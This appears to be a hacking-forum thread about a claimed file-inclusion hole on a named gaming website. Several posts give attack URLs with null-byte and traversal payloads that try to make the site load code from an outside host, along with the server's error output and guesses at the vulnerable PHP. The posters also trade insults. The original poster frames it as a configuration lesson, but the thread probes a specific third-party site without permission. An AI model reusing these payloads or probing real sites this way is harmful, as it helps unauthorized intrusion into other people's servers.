[File Inclusion] Eternia Games

[WarmongerR7]

Here to show you a little exploit on Eternia's website that would almost allow you to execute any of your own scripts under web server privileges (a shell or whatever) with ease. This is only to show you why you should always turn allow_url_fopen off in your php configuration.

Code:

http://lastchaos.eterniagames.com/s_ep3/?lang=http://site.com/code.txt%00

Which gives us a result of.

Code:

Warning: require(_cache/lang.http://site.com/code.txt) [function.require]: failed to open stream: No such file or directory in /var/www/vhosts/eterniagames.com/subdomains/lastchaos/httpdocs/s_ep3/index.config.php on line 514

If the server permitted traversal we could simply do the following to jump down two directories.

Code:

http://lastchaos.eterniagames.com/s_ep3/?lang=..%2f..%2fhttp://site.com/code.txt%00

And inject our own code into the site. This is for learning purposes only. I suggest not attacking random servers thinking this is going to work, because it wont. This just goes to show some of the biggest servers, aren't always the securest.

[FapMax]

This Website "Error" is totally worth it you are WRONG. You cant inject anything there.

The Source looks like this :

PHP Code:

require('lang.' . $_GET['lang'] . '.php'); 


Your Injection Point :

PHP Code:

require('lang.INJECTION.php'); 


You cant paste any Code in there. There is no way to Request other Files except the Files on there own FTP called "lang." at the start.
I found this befor but it does not give any vulnerable point thats why i didnt post it, anyway good work for the Start.

[WarmongerR8]

Quote:

Originally Posted by FapMax

This Website "Error" is totally worth it you are WRONG. You cant inject anything there.

The Source looks like this :

PHP Code:

require('lang.' . $_GET['lang'] . '.php'); 


Your Injection Point :

PHP Code:

require('lang.INJECTION.php'); 


You cant paste any Code in there. There is no way to Request other Files except the Files on there own FTP called "lang." at the start.
I found this befor but it does not give any vulnerable point thats why i didnt post it, anyway good work for the Start.

You are wrong, this hole isn't abusable because of the parameters existing server side. It would be possible to execute a shell on the web server if it allowed traversal, but it does not (like I explained to you in the first post). This is to teach you how to setup server software properly (i.e. PHP) so you don't end up hacked with a similar hole. Also your injection point is wrong.

Code:

require(_cache/lang.<injection point>%00);

Also the server side code most likely looks like this.

Code:

require($_GET['cache'] . $_GET['lang'] . '.php');

If you have any more questions feel free to ask. If you would like help securing your website/server feel free to pm me, and we will negotiate.

[Wayne...?]

Oh Nooo WarmongerR7 Are Banned now WarmongerR8

This generation will never End

[FapMax]

Quote:

Originally Posted by WarmongerR8

You are wrong, this hole isn't abusable because of the parameters existing server side. It would be possible to execute a shell on the web server if it allowed traversal, but it does not (like I explained to you in the first post). This is to teach you how to setup server software properly (i.e. PHP) so you don't end up hacked with a similar hole. Also your injection point is wrong.

Code:

require(_cache/lang.<injection point>%00);

Also the server side code most likely looks like this.

Code:

require($_GET['cache'] . $_GET['lang'] . '.php');

If you have any more questions feel free to ask. If you would like help securing your website/server feel free to pm me, and we will negotiate.

******, i loled : "$_GET['cache']" xD
Read please.

[WarmongerR8]

Quote:

Originally Posted by FapMax

Retard, i loled : "$_GET['cache']" xD
Read please.

PS: Enjoy your Ban.

My bad, drunk and high. Here is what it should look like.

Code:

require($settings['cache'] . $_GET['lang'] . '.php');

Again, if you have any questions feel free to ask.

Quote:

Originally Posted by FapMax

PS: Enjoy your Ban.

I'll be here forever, to teach kiddies like you.